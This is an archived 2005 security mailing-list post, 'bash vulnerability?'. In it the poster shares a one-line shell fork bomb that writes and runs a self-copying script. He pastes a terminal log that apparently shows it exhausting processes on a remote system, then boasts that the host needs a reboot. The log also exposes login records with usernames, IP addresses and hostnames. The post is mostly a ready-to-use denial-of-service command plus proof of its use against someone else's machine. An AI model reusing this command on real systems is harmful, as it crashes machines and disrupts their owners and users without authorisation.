lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list] 
Date: Tue Aug 16 14:48:33 2005
From: lsw at digitalsec.net (luke)
Subject: bash vulnerability?

This work also:      echo "\$0&\$0">_;chmod +x _;./_


http://www.digitalsec.net/stuff/fun/CCC/ccc_and_cccs.txt

ps       pts/5        217.6.158.38     Fri Oct  1 08:08 - 08:09  (00:00)
moi      ftpd3326     p83.129.176.147. Fri Oct  1 05:11 - 05:11  (00:00)
jtesch   pts/9        herzog.cse.unsw. Fri Oct  1 04:34 - 09:32  (04:58)

sh-2.04$ uptime
9:38pm  up 179 days, 10:50, 21 users,  load average: 2.02, 2.79, 2.73 .
GREAT!

sh-2.04$ echo "\$0&\$0">_;chmod +x _;./_
ls
sh: fork: Resource temporarily unavailable
asd
sh: fork: Resource temporarily unavailable
asd
^]
telnet> quit
Connection closed.
(root@...ow):~ $ telnet www.cccs.de 4000
Trying 193.7.177.252...
Connected to www.cccs.de.
Escape character is '^]'.
Connection closed by foreign host.

0ops! Sorry, seems to need a reboot :(/lsw

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ